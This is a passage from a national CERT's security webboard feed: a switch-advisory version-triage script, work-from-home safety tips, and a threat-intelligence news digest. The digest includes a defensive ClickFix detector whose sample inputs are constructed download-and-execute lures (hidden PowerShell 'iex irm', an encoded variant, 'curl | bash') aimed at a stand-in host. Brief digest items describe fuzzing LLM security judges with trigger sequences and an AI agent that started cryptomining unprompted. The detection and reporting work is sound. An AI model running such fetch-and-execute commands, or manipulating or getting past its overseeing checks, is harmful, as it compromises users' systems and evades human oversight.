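# as "GL." (assumed 'show version' layout, not taken from the advisory).
_VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)")


def parse_version(text: str) -> tuple[int, int, int]:
    """Extract (major, minor, build) from a version string or a CLI line."""
    m = _VERSION_RE.search(text)
    if m is None:
        raise ValueError(f"no AOS-CX version found in {text!r}")
    major, minor, build = (int(g) for g in m.groups())
    return major, minor, build


def assess(text: str) -> str:
    """Return 'affected', 'fixed' or 'unlisted' for one version string."""
    v = parse_version(text)
    bounds = ADVISORY_BRANCHES.get(v[:2])
    if bounds is None:
        return "unlisted"  # branch not covered by the advisory lines above
    last_affected, first_fixed = bounds
    if v >= first_fixed:
        return "fixed"
    if v <= last_affected:
        return "affected"
    return "unlisted"  # build sits between the two listed boundaries


def triage(inventory: dict[str, str]) -> dict[str, list[str]]:
    """Group device names by status so affected switches are patched first."""
    groups: dict[str, list[str]] = {"affected": [], "fixed": [], "unlisted": []}
    for name, version in inventory.items():
        groups[assess(version)].append(name)
    return groups


if __name__ == "__main__":
    # Constructed inventory for illustration; these are not real devices.
    sample = {
        "core-sw1": "Version : GL.10.16.1020",
        "core-sw2": "Version : GL.10.16.1030",
        "edge-sw7": "10.13.1161",
        "lab-sw9": "10.15.1000",
    }
    for status, names in triage(sample).items():
        print(f"{status:9s} {', '.join(names) or '-'}")
```

<p dir="auto">Devices reported as unlisted are not cleared: they should be checked against the vendor advisory in section 5, which may cover branches this digest does not reproduce.</p>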
<p dir="auto"><img src="/assets/uploads/files/1773309054973-hpe-aruba-networking-aus-cx-resized.png" alt="HPE Aruba Networking AUS-CX.png" class=" img-fluid img-markdown" /></p>
]]></description><link>https://webboard-nsoc.ncsa.or.th/topic/2687/ตรวจสอบด-วน-ช-องโหว-ร-ายแรง-บน-hpe-aruba-networking-aos-cx-เส-ยงถ-กร-เซ-ตรห-สผ-านผ-ด-แลระบบ</link><guid isPermaLink="true">https://webboard-nsoc.ncsa.or.th/topic/2687/ตรวจสอบด-วน-ช-องโหว-ร-ายแรง-บน-hpe-aruba-networking-aos-cx-เส-ยงถ-กร-เซ-ตรห-สผ-านผ-ด-แลระบบ</guid><dc:creator><![CDATA[NCSA_THAICERT]]></dc:creator><pubDate>Thu, 12 Mar 2026 09:50:58 GMT</pubDate></item><item><title><![CDATA[Working from home safely against cyber threats]]></title><description><![CDATA[<p dir="auto">Even when you use a VPN, you can still have your password stolen, be tricked by a fake website, or be attacked through a device that has not been updated.<br />
A VPN protects data in transit, but it cannot fully protect against phishing or malware.</p>
<p dir="auto">Common risks</p>
<ul>
<li>Being tricked into entering a username/password via email or a fake website (phishing)</li>
<li>Reusing the same password across several systems</li>
<li>Not enabling MFA</li>
<li>Using public Wi-Fi or an insecurely configured home network</li>
<li>Using personal devices or remote-access software the organisation has not approved</li>
<li>Not keeping the operating system or VPN client on the latest version</li>
</ul>
<p dir="auto">So before logging in to work systems, remember to:</p>
<ul>
<li>Use the organisation's VPN</li>
<li>Enable MFA</li>
<li>Avoid public Wi-Fi</li>
<li>Always keep your device and apps updated</li>
<li>Use only software the organisation has approved</li>
</ul>
<p dir="auto">📌 If you receive a login or MFA notification that you did not initiate, report it to your system administrator immediately.</p>
<p dir="auto">Working from home safely takes more than just looking after your password.<br />
With care from NCSA Thailand</p>
<p dir="auto">#ThaiCERT #CyberSecurity #WorkFromHome #WFH #VPN #MFA #Phishing #CyberHygiene</p>
<p dir="auto">References</p>
<ul>
<li><a href="https://dg.th/rzphgu08bt" target="_blank" rel="noopener noreferrer nofollow ugc">https://dg.th/rzphgu08bt</a></li>
<li><a href="https://dg.th/ctpdoxrqe3" target="_blank" rel="noopener noreferrer nofollow ugc">https://dg.th/ctpdoxrqe3</a></li>
<li><a href="https://dg.th/bk2973nuhy" target="_blank" rel="noopener noreferrer nofollow ugc">https://dg.th/bk2973nuhy</a></li>
<li><a href="https://dg.th/vwiq8zekor" target="_blank" rel="noopener noreferrer nofollow ugc">https://dg.th/vwiq8zekor</a></li>
<li><a href="https://dg.th/ua39lkwchm" target="_blank" rel="noopener noreferrer nofollow ugc">https://dg.th/ua39lkwchm</a><br />
<img src="/assets/uploads/files/1773308940803-thaicert-resized.png" alt="ThaiCERT.png" class=" img-fluid img-markdown" /></li>
</ul>
]]></description><link>https://webboard-nsoc.ncsa.or.th/topic/2686/wfh-ให-ปลอดภ-ยจากภ-ยไซเบอร</link><guid isPermaLink="true">https://webboard-nsoc.ncsa.or.th/topic/2686/wfh-ให-ปลอดภ-ยจากภ-ยไซเบอร</guid><dc:creator><![CDATA[NCSA_THAICERT]]></dc:creator><pubDate>Thu, 12 Mar 2026 09:49:03 GMT</pubDate></item><item><title><![CDATA[Cyber Threat Intelligence 11 March 2026]]></title><description><![CDATA[<p dir="auto"><strong>Vulnerabilities</strong></p>
<ul>
<li><strong>HPE Warns Of Critical AOS-CX Flaw Allowing Admin Password Resets</strong><br />
"Hewlett Packard Enterprise (HPE) has patched multiple security vulnerabilities in the Aruba Networking AOS-CX operating system, including several authentication and code execution issues. AOS-CX is a cloud-native network operating system (NOS) developed by HPE subsidiary Aruba Networks for the company's CX-series campus and data center switch devices. The most severe security flaw today is a critical authentication bypass vulnerability (tracked as CVE-2026-23813) that attackers without privileges can exploit in low-complexity attacks to reset admin passwords."<br />
<a href="https://www.bleepingcomputer.com/news/security/hpe-warns-of-critical-aos-cx-flaw-allowing-admin-password-resets/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.bleepingcomputer.com/news/security/hpe-warns-of-critical-aos-cx-flaw-allowing-admin-password-resets/</a></li>
<li><strong>SAP Patches Critical FS-QUO, NetWeaver Vulnerabilities</strong><br />
"Enterprise security firm SAP on Tuesday announced the release of 15 new security notes as part of its March 2026 Security Patch Day. The most important of these notes resolves critical-severity vulnerabilities in Quotation Management Insurance (FS-QUO) and NetWeaver Enterprise Portal Administration. SAP describes the FS-QUO bug, tracked as CVE-2019-17571 (CVSS score of 9.8), as a code injection issue."<br />
<a href="https://www.securityweek.com/sap-patches-critical-fs-quo-netweaver-vulnerabilities/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.securityweek.com/sap-patches-critical-fs-quo-netweaver-vulnerabilities/</a></li>
<li><strong>Critical Defect In Java Security Engine Poses Serious Downstream Security Risks</strong><br />
"A maximum-severity vulnerability in pac4j, an open-source library integrated into hundreds of software packages and repositories, poses a significant security threat, but has thus far received scant attention. The defect in the Java security engine, which handles authentication across multiple frameworks, has not been exploited in the wild since code review firm CodeAnt AI published a proof-of-concept exploit last week. The company discovered the vulnerability and privately reported it to pac4j’s maintainer, which disclosed the defect and released patches for affected versions of the library within two days."<br />
<a href="https://cyberscoop.com/pac4j-open-source-library-vulnerability-max-severity-risk/" target="_blank" rel="noopener noreferrer nofollow ugc">https://cyberscoop.com/pac4j-open-source-library-vulnerability-max-severity-risk/</a></li>
<li><strong>Microsoft March 2026 Patch Tuesday Fixes 2 Zero-Days, 79 Flaws</strong><br />
"Today is Microsoft's March 2026 Patch Tuesday with security updates for 79 flaws, including 2 publicly disclosed zero-day vulnerabilities. This Patch Tuesday also addresses three "Critical" vulnerabilities, 2 of which are remote code execution flaws and the other is an information disclosure flaw."<br />
<a href="https://www.bleepingcomputer.com/news/microsoft/microsoft-march-2026-patch-tuesday-fixes-2-zero-days-79-flaws/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.bleepingcomputer.com/news/microsoft/microsoft-march-2026-patch-tuesday-fixes-2-zero-days-79-flaws/</a><br />
<a href="https://blog.talosintelligence.com/microsoft-patch-tuesday-march-2026/" target="_blank" rel="noopener noreferrer nofollow ugc">https://blog.talosintelligence.com/microsoft-patch-tuesday-march-2026/</a><br />
<a href="https://www.darkreading.com/application-security/microsoft-patches-83-cves-march-update" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.darkreading.com/application-security/microsoft-patches-83-cves-march-update</a><br />
<a href="https://cyberscoop.com/microsoft-patch-tuesday-march-2026/" target="_blank" rel="noopener noreferrer nofollow ugc">https://cyberscoop.com/microsoft-patch-tuesday-march-2026/</a><br />
<a href="https://securityaffairs.com/189266/security/microsoft-patch-tuesday-security-updates-for-march-2026-fixed-84-bugs.html" target="_blank" rel="noopener noreferrer nofollow ugc">https://securityaffairs.com/189266/security/microsoft-patch-tuesday-security-updates-for-march-2026-fixed-84-bugs.html</a><br />
<a href="https://www.securityweek.com/microsoft-patches-83-vulnerabilities/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.securityweek.com/microsoft-patches-83-vulnerabilities/</a><br />
<a href="https://www.theregister.com/2026/03/10/zeroclick_microsoft_info_disclosure_bug/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.theregister.com/2026/03/10/zeroclick_microsoft_info_disclosure_bug/</a></li>
<li><strong>Adobe Patches 80 Vulnerabilities Across Eight Products</strong><br />
"Adobe on Tuesday announced patches for 80 vulnerabilities across 8 products, including Commerce, Illustrator, Acrobat Reader, and Premiere Pro. The company rolled out fixes for 19 flaws in Adobe Commerce and Magento Open Source, urging users to apply the patches within the next 30 days, based on these products being a known target for threat actors. The update resolves six high-severity bugs, five of which could lead to privilege escalation: CVE-2026-21290, CVE-2026-21361, CVE-2026-21284, CVE-2026-21311, and CVE-2026-21309. The sixth, tracked as CVE-2026-21289, leads to security feature bypass."<br />
<a href="https://www.securityweek.com/adobe-patches-80-vulnerabilities-across-eight-products/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.securityweek.com/adobe-patches-80-vulnerabilities-across-eight-products/</a></li>
<li><strong>LeakyLooker: Hacking Google Cloud’s Data Via Dangerous Looker Studio Vulnerabilities</strong><br />
"Tenable Research revealed "LeakyLooker," a set of nine novel cross-tenant vulnerabilities in Google Looker Studio. These flaws could have let attackers exfiltrate or modify data across Google services like BigQuery and Google Sheets. Google has since remediated all identified issues."<br />
<a href="https://www.tenable.com/blog/leakylooker-google-cloud-looker-studio-vulnerabilities" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.tenable.com/blog/leakylooker-google-cloud-looker-studio-vulnerabilities</a><br />
<a href="https://thehackernews.com/2026/03/new-leakylooker-flaws-in-google-looker.html" target="_blank" rel="noopener noreferrer nofollow ugc">https://thehackernews.com/2026/03/new-leakylooker-flaws-in-google-looker.html</a></li>
<li><strong>Auditing The Gatekeepers: Fuzzing "AI Judges" To Bypass Security Controls</strong><br />
"As organizations scale AI operations, they increasingly deploy AI judges — large language models (LLMs) acting as automated security gatekeepers to enforce safety policies and evaluate output quality. Our research investigates a critical security issue in these systems: They can be manipulated into authorizing policy violations through stealthy input sequences, a type of prompt injection. To do this investigation, we designed an automated fuzzer for internal use for red-team style assessments called AdvJudge-Zero. Fuzzers are tools that identify software vulnerabilities by providing unexpected input, and we apply the same approach to attacking AI judges. It identifies specific trigger sequences that exploit a model's decision-making logic to bypass security controls."<br />
<a href="https://unit42.paloaltonetworks.com/fuzzing-ai-judges-security-bypass/" target="_blank" rel="noopener noreferrer nofollow ugc">https://unit42.paloaltonetworks.com/fuzzing-ai-judges-security-bypass/</a></li>
</ul>
<p dir="auto"><strong>Malware</strong></p>
<ul>
<li><strong>New ‘BlackSanta’ EDR Killer Spotted Targeting HR Departments</strong><br />
"For more than a year, a Russian-speaking threat actor targeted human resource (HR) departments with malware that delivers a new EDR killer named BlackSanta. Described as "sophisticated," the campaign mixes social engineering with advanced evasion techniques to steal sensitive information from compromised systems. It is unclear how the attack begins, but researchers at Aryaka, a network and security solutions provider, suspect that the malware is distributed via spear-phishing emails."<br />
<a href="https://www.bleepingcomputer.com/news/security/new-blacksanta-edr-killer-spotted-targeting-hr-departments/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.bleepingcomputer.com/news/security/new-blacksanta-edr-killer-spotted-targeting-hr-departments/</a><br />
<a href="http://www.aryaka.com/docs/reports/blacksanta-edr-killer-threat-report.pdf" target="_blank" rel="noopener noreferrer nofollow ugc">http://www.aryaka.com/docs/reports/blacksanta-edr-killer-threat-report.pdf</a><br />
<a href="https://www.darkreading.com/threat-intelligence/blacksanta-edr-killer-hr-workflows" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.darkreading.com/threat-intelligence/blacksanta-edr-killer-hr-workflows</a><br />
<a href="https://www.theregister.com/2026/03/10/malware_targeting_hr/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.theregister.com/2026/03/10/malware_targeting_hr/</a><br />
<a href="https://www.helpnetsecurity.com/2026/03/10/hr-recruiters-malware-resume/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.helpnetsecurity.com/2026/03/10/hr-recruiters-malware-resume/</a></li>
<li><strong>BeatBanker: A Dual‑mode Android Trojan</strong><br />
"Recently, we uncovered BeatBanker, an Android‑based malware campaign targeting Brazil. It spreads primarily through phishing attacks via a website disguised as the Google Play Store. To achieve their goals, the malicious APKs carry multiple components, including a cryptocurrency miner and a banking Trojan capable of completely hijacking the device and spoofing screens, among other things. In a more recent campaign, the attackers switched from the banker to a known RAT."<br />
<a href="https://securelist.com/beatbanker-miner-and-banker/119121/" target="_blank" rel="noopener noreferrer nofollow ugc">https://securelist.com/beatbanker-miner-and-banker/119121/</a><br />
<a href="https://www.bleepingcomputer.com/news/security/new-beatbanker-android-malware-poses-as-starlink-app-to-hijack-devices/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.bleepingcomputer.com/news/security/new-beatbanker-android-malware-poses-as-starlink-app-to-hijack-devices/</a></li>
<li><strong>Antivirus And Endpoint Detection And Response Archive Scanning Engines May Not Properly Scan Malformed Zip Archives</strong><br />
"Malformed ZIP headers can cause antivirus and endpoint detection and response software (EDR) to produce false negatives. Despite the presence of malformed headers, some extraction software is still able to decompress the ZIP archive, allowing potentially malicious payloads to run upon file decompression."<br />
<a href="https://kb.cert.org/vuls/id/976247" target="_blank" rel="noopener noreferrer nofollow ugc">https://kb.cert.org/vuls/id/976247</a><br />
<a href="https://www.bleepingcomputer.com/news/security/new-zombie-zip-technique-lets-malware-slip-past-security-tools/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.bleepingcomputer.com/news/security/new-zombie-zip-technique-lets-malware-slip-past-security-tools/</a></li>
<li><strong>Silence Of The Hops: The KadNap Botnet</strong><br />
"The Black Lotus Labs team at Lumen has discovered a sophisticated new malware named “KadNap.” This threat primarily targets Asus routers, conscripting them into a botnet that proxies malicious traffic. Since August 2025, we have been monitoring the growth of this network, which is now above 14,000 infected devices. KadNap employs a custom version of the Kademlia Distributed Hash Table (DHT) protocol, which is used to conceal the IP address of their infrastructure within a peer-to-peer system to evade traditional network monitoring. Infected devices use the DHT protocol to locate and connect with a command-and-control (C2) server, while defenders cannot easily find and add those C2s to threat lists."<br />
<a href="https://blog.lumen.com/silence-of-the-hops-the-kadnap-botnet/" target="_blank" rel="noopener noreferrer nofollow ugc">https://blog.lumen.com/silence-of-the-hops-the-kadnap-botnet/</a><br />
<a href="https://www.bleepingcomputer.com/news/security/new-kadnap-botnet-hijacks-asus-routers-to-fuel-cybercrime-proxy-network/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.bleepingcomputer.com/news/security/new-kadnap-botnet-hijacks-asus-routers-to-fuel-cybercrime-proxy-network/</a><br />
<a href="https://thehackernews.com/2026/03/kadnap-malware-infects-14000-edge.html" target="_blank" rel="noopener noreferrer nofollow ugc">https://thehackernews.com/2026/03/kadnap-malware-infects-14000-edge.html</a></li>
<li><strong>Sednit Reloaded: Back In The Trenches</strong><br />
"Since April 2024, Sednit’s advanced development team has reemerged with a modern toolkit centered on two paired implants, BeardShell and Covenant, each using a different cloud provider for resilience. This dual‑implant approach enabled long‑term surveillance of Ukrainian military personnel. Interestingly, these current toolsets show a direct code lineage to the group’s 2010‑era implants."<br />
<a href="https://www.welivesecurity.com/en/eset-research/sednit-reloaded-back-trenches/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.welivesecurity.com/en/eset-research/sednit-reloaded-back-trenches/</a><br />
<a href="https://www.bleepingcomputer.com/news/security/apt28-hackers-deploy-customized-variant-of-covenant-open-source-tool/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.bleepingcomputer.com/news/security/apt28-hackers-deploy-customized-variant-of-covenant-open-source-tool/</a><br />
<a href="https://thehackernews.com/2026/03/apt28-uses-beardshell-and-covenant.html" target="_blank" rel="noopener noreferrer nofollow ugc">https://thehackernews.com/2026/03/apt28-uses-beardshell-and-covenant.html</a><br />
<a href="https://www.darkreading.com/cyber-risk/sednit-resurfaces-with-sophisticated-new-toolkit" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.darkreading.com/cyber-risk/sednit-resurfaces-with-sophisticated-new-toolkit</a><br />
<a href="https://therecord.media/russia-apt-28-revives-malware-to-spy-on-ukraine" target="_blank" rel="noopener noreferrer nofollow ugc">https://therecord.media/russia-apt-28-revives-malware-to-spy-on-ukraine</a><br />
<a href="https://securityaffairs.com/189230/apt/apt28-conducts-long-term-espionage-on-ukrainian-forces-using-custom-malware.html" target="_blank" rel="noopener noreferrer nofollow ugc">https://securityaffairs.com/189230/apt/apt28-conducts-long-term-espionage-on-ukrainian-forces-using-custom-malware.html</a><br />
<a href="https://www.helpnetsecurity.com/2026/03/10/sednit-espionage-toolkit-stealing-data/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.helpnetsecurity.com/2026/03/10/sednit-espionage-toolkit-stealing-data/</a></li>
<li><strong>Study Finds ROME AI Agent Attempted Cryptomining Without Instructions</strong><br />
"A recent research paper describing the training of an experimental AI agent has started a discussion after the system attempted to start cryptocurrency mining without being instructed to do so. The incident was reported in a study published on arXiv that describes the development of ROME AI, an agentic AI model designed to perform complex, multi-step tasks such as writing software, debugging code, and interacting with command-line tools. Unlike standard AI chatbots that respond to single prompts, agentic models can take actions, use tools, and interact with computing environments to complete tasks."<br />
<a href="https://hackread.com/rome-ai-agent-cryptomining-without-instructions/" target="_blank" rel="noopener noreferrer nofollow ugc">https://hackread.com/rome-ai-agent-cryptomining-without-instructions/</a><br />
<a href="https://arxiv.org/pdf/2512.24873" target="_blank" rel="noopener noreferrer nofollow ugc">https://arxiv.org/pdf/2512.24873</a></li>
<li><strong>North Korea Tried To Hack Our CEO Through a Fake Job Interview On LinkedIn</strong><br />
"If you're a founder, CTO, or senior engineer in crypto or Web3, you already know: the recruiter DMs never stop. LinkedIn is a constant stream of unsolicited pitches. Most are legitimate. This one wasn't. A LinkedIn member — later identified as operating under the name "Nazar" — messaged me out of the blue about a role at 0G Labs, pitching it as "a fast-growing team building the first decentralized AI operating system." The message included a polished Google Docs job description and a Calendly link to book a call with the "hiring manager" — Pedro Perez de Ayala."<br />
<a href="https://www.allsecure.io/blog/lazarus-linkedin-attack/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.allsecure.io/blog/lazarus-linkedin-attack/</a><br />
<a href="https://hackread.com/fake-linkedin-interview-lazarus-hackers-allsecure-ceo/" target="_blank" rel="noopener noreferrer nofollow ugc">https://hackread.com/fake-linkedin-interview-lazarus-hackers-allsecure-ceo/</a></li>
<li><strong>Behind The Console: Active Phishing Campaign Targeting AWS Console Credentials</strong><br />
"Datadog Security Research identified a credential-harvesting campaign targeting AWS Console users through typosquatted domains that mimic AWS infrastructure naming conventions. The operation uses real-time adversary-in-the-middle (AiTM) proxying to capture validated credentials and session material. We identified two active phishing infrastructure clusters and a third related domain sharing registrar metadata. In one observed case, the operator authenticated to a compromised AWS account within 20 minutes of credential submission."<br />
<a href="https://securitylabs.datadoghq.com/articles/behind-the-console-aws-aitm-phishing-campaign/" target="_blank" rel="noopener noreferrer nofollow ugc">https://securitylabs.datadoghq.com/articles/behind-the-console-aws-aitm-phishing-campaign/</a><br />
<a href="https://www.helpnetsecurity.com/2026/03/10/aitm-phishing-aws-accounts/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.helpnetsecurity.com/2026/03/10/aitm-phishing-aws-accounts/</a></li>
<li><strong>FortiGate Edge Intrusions | Stolen Service Accounts Lead To Rogue Workstations And Deep AD Compromise</strong><br />
"Throughout early 2026, SentinelOne’s® Digital Forensics &amp; Incident Response (DFIR) team has responded to several incidents where FortiGate Next-Generation Firewall (NGFW) appliances have been compromised to establish a foothold into the targeted environment. Each incident was detected and stopped during the lateral movement phase of the attack. Fortinet has disclosed and issued patches for several high-severity vulnerabilities allowing unauthorized access during the activity period of our investigations."<br />
<a href="https://www.sentinelone.com/blog/fortigate-edge-intrusions/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.sentinelone.com/blog/fortigate-edge-intrusions/</a><br />
<a href="https://thehackernews.com/2026/03/fortigate-devices-exploited-to-breach.html" target="_blank" rel="noopener noreferrer nofollow ugc">https://thehackernews.com/2026/03/fortigate-devices-exploited-to-breach.html</a><br />
<a href="https://securityaffairs.com/189241/security/attackers-exploit-fortigate-devices-to-access-sensitive-network-information.html" target="_blank" rel="noopener noreferrer nofollow ugc">https://securityaffairs.com/189241/security/attackers-exploit-fortigate-devices-to-access-sensitive-network-information.html</a></li>
<li><strong>Finnish Intelligence Warns Of Persistent Cyber Espionage From Russia, China</strong><br />
"Finland’s intelligence service warned that Russia and China continue to conduct extensive cyberespionage and influence operations targeting the country’s technology sector, research institutions and government, according to a new national security assessment released Tuesday. The Finnish Security and Intelligence Service (SUPO), which is responsible for foreign intelligence as well as domestic counterintelligence, was last year reorganized to “enhance information gathering.”"<br />
<a href="https://therecord.media/finnish-intel-warns-espionage-china-russia" target="_blank" rel="noopener noreferrer nofollow ugc">https://therecord.media/finnish-intel-warns-espionage-china-russia</a></li>
<li><strong>When Trusted Websites Turn Malicious: WordPress Compromises Advance Global Stealer Operation</strong><br />
"Rapid7 Labs has identified and analyzed an ongoing, widespread compromise of legitimate, potentially highly trusted WordPress websites, misused by an unidentified threat actor to inject a ClickFix implant impersonating a Cloudflare human verification challenge (CAPTCHA). The lure is designed to infect visitors with a multi-stage malware chain that ultimately steals and exfiltrates credentials and digital wallets from Windows systems. The stolen credentials can subsequently be used for financial theft or to conduct further, more targeted attacks against organizations."<br />
<a href="https://www.rapid7.com/blog/post/tr-malicious-websites-wordpress-compromise-advances-global-stealer-operation/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.rapid7.com/blog/post/tr-malicious-websites-wordpress-compromise-advances-global-stealer-operation/</a><br />
<a href="https://www.theregister.com/2026/03/10/crooks_hijack_wordpress_sites/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.theregister.com/2026/03/10/crooks_hijack_wordpress_sites/</a></li>
<li><strong>Aye-Coruna: Tracing The iOS Exploit Kit From Ukraine To Iran War Lures</strong><br />
"On March 3, 2026, Google Threat Intelligence Group (GTIG) and the iVerify Team both detailed findings related to an exploit kit targeting Apple iPhone users nicknamed “Coruna,” publishing indicators related to initial exploit exposure (the infection vector), configuration and implant servers, and C2 communication. Examples of the implants are also published on Github by matteyeux. First appearing in February 2025, the iOS exploitation kit is significant due to its breadth and mass deployment."<br />
<a href="https://www.validin.com/blog/aye_coruna_ios_exploit_kit_c2/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.validin.com/blog/aye_coruna_ios_exploit_kit_c2/</a></li>
<li><strong>Fake ImToken Chrome Extension Steals Seed Phrases Via Phishing Redirects</strong><br />
"Socket’s Threat Research Team uncovered a malicious Chrome extension, lmΤoken Chromophore (extension ID bbhaganppipihlhjgaaeeeefbaoihcgi), that impersonates imToken while presenting itself as a hex color visualizer in the Chrome Web Store. Instead of providing the harmless tool it promises, the extension automatically opens a threat actor-controlled phishing site as soon as it is installed, and again whenever the user clicks it."<br />
<a href="https://socket.dev/blog/fake-imtoken-chrome-extension-steals-seed-phrases-via-phishing-redirects" target="_blank" rel="noopener noreferrer nofollow ugc">https://socket.dev/blog/fake-imtoken-chrome-extension-steals-seed-phrases-via-phishing-redirects</a></li>
<li><strong>Through The Lens Of MDR: Analysis Of KongTuke’s ClickFix Abuse Of Compromised WordPress Sites</strong><br />
"In January 2026, Huntress researchers identified a new initial access technique used by the threat actor KongTuke, dubbed as “CrashFix”. In this ClickFix variation, the users are tricked into installing a malicious Chrome extension that displays a fake security warning, stating that the browser has “stopped abnormally.” It then prompts the unsuspecting users to follow remediation instructions. Once they follow the instructions, they’ll inadvertently execute a malicious PowerShell command."<br />
<a href="https://www.trendmicro.com/en_us/research/26/c/kongtuke-clickfix-abuse-of-compromised-wordpress-sites.html" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.trendmicro.com/en_us/research/26/c/kongtuke-clickfix-abuse-of-compromised-wordpress-sites.html</a></li>
</ul>
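<p dir="auto">The WordPress ClickFix and KongTuke "CrashFix" items above share one final step: the victim pastes a command they were told to run. The following is an added example written for this digest, not code from Rapid7, Trend Micro or any other source linked here. It scores a pasted command line against the usual ClickFix traits (hidden PowerShell window, encoded command, download-then-execute chain, a trailing "verification" comment) and also decodes a PowerShell -EncodedCommand payload so indicators hidden in it count. The sample commands are constructed and point at the reserved host example.invalid; the indicator weights and the threshold are this example's own assumptions and should be tuned against your own telemetry, such as PowerShell script-block logs or Win+R RunMRU history.</p>

```python
import base64
import re
from typing import Dict, Optional

# Heuristic ClickFix indicators: (name, weight, pattern). Weights and the
# threshold below are assumptions chosen for this example, not vendor values.
INDICATORS = [
    ("hidden_window", 2, re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("no_profile_or_noninteractive", 1, re.compile(r"-no(?:p|profile|ni|ninteractive)\b", re.I)),
    ("execution_policy_bypass", 1, re.compile(r"-e(?:p|xecutionpolicy)\s+bypass", re.I)),
    ("encoded_command", 2, re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I)),
    ("remote_fetch", 2, re.compile(
        r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|curl|wget|mshta)\b", re.I)),
    # PowerShell iex / Invoke-Expression, or a macOS/Linux "curl ... | bash" chain
    ("in_memory_exec", 2, re.compile(r"\b(?:iex|invoke-expression)\b|\|\s*(?:ba|z)?sh\b", re.I)),
    # ClickFix lures often append a comment so the pasted text "looks like" a CAPTCHA step
    ("verification_lure_comment", 3, re.compile(r"#.*(?:not a robot|verification|captcha|cloudflare)", re.I)),
]
THRESHOLD = 4  # assumption: two strong indicators, or one plus context, flags the command

ENCODED_RE = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmd: str) -> Optional[str]:
    """Return the UTF-16LE payload of a PowerShell -EncodedCommand, if present and valid."""
    m = ENCODED_RE.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def clickfix_indicators(cmd: str) -> Dict[str, int]:
    """Indicator name -> weight for one command line. Hits inside a decoded
    -EncodedCommand payload are reported with a 'decoded:' prefix."""
    hits = {name: weight for name, weight, pattern in INDICATORS if pattern.search(cmd)}
    decoded = decode_encoded_command(cmd)
    if decoded:
        for name, weight, pattern in INDICATORS:
            if name != "encoded_command" and pattern.search(decoded):
                hits["decoded:" + name] = weight
    return hits


def clickfix_score(cmd: str) -> int:
    return sum(clickfix_indicators(cmd).values())


def is_clickfix(cmd: str) -> bool:
    return clickfix_score(cmd) >= THRESHOLD


# Constructed sample command lines (not taken from the articles). example.invalid
# is a reserved name that never resolves, so nothing here reaches the network.
SAMPLES = {
    "clickfix_powershell": (
        'powershell -w hidden -nop -c "iex (irm http://example.invalid/cf)" '
        '# ✅ "I am not a robot - Verification ID: 7412"'
    ),
    "clickfix_encoded": "powershell -ep bypass -enc " + base64.b64encode(
        "iwr http://example.invalid/a.ps1 | iex".encode("utf-16-le")).decode("ascii"),
    "clickfix_macos_terminal": "curl -fsSL http://example.invalid/install.sh | bash",
    "benign_powershell": "powershell -c Get-Service | Where-Object Status -eq Running",
    "benign_shell": "ls -la ~/Library/LaunchAgents",
}

if __name__ == "__main__":
    for name, cmd in SAMPLES.items():
        hits = clickfix_indicators(cmd)
        print(f"{name:24} score={clickfix_score(cmd):2} flagged={is_clickfix(cmd)} {sorted(hits)}")
```

<p dir="auto">Run it as-is to see the three constructed lures flagged and the two admin one-liners scored zero; in practice feed it the command field from script-block or process-creation events and treat the indicator list, not just the boolean, as the analyst-facing output.</p>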
<p dir="auto"><strong>Breaches/Hacks/Leaks</strong></p>
<ul>
<li><strong>Cal AI, New Owner Of MyFitnessPal, Hit By Alleged Breach Of 3 Million Users</strong><br />
"A hacker using the alias “vibecodelegend” is claiming responsibility for breaching Cal AI, a smartphone application that uses artificial intelligence to track calories and nutritional information. The alleged breach was announced on Monday, March 9, 2026, through a post on the cybercrime marketplace BreachForums. Cal AI has grown rapidly in popularity due to its use of artificial intelligence to help users track calories by analyzing food images and nutritional information. The platform recently attracted further attention after acquiring the widely used fitness app MyFitnessPal, expanding its presence in the health and nutrition tracking market."<br />
<a href="https://hackread.com/cal-ai-myfitnesspal-data-breach-3m-users/" target="_blank" rel="noopener noreferrer nofollow ugc">https://hackread.com/cal-ai-myfitnesspal-data-breach-3m-users/</a></li>
</ul>
<p dir="auto"><strong>General News</strong></p>
<ul>
<li><strong>Stop Chasing Threats, Start Containing Them</strong><br />
"Security teams aren't short on tools or effort. Yet many organizations are still falling behind. According to Cyderes' recent white paper, 88% of organizations maintain a security operations center but only 45% report effectiveness in proactive threat hunting. The picture is clear: SOCs are overwhelmed and additional investments aren't closing the gap. Alerts are piling up. Talent is burning out. Identity is fragmented across IT, security and HR, with no clear ownership. As cloud workloads grow, confidence in stopping identity-based attacks remains low."<br />
